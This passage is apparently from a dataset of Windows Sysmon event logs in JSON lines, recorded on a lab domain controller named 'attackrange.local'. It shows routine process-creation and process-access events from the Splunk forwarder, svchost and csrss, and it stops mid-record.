{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.875\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-0010B8C20500}\r\nProcessId: 5100\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.875","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-0010B8C20500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010B8C20500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010B8C20500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010B8C20500}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010B8C20500}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 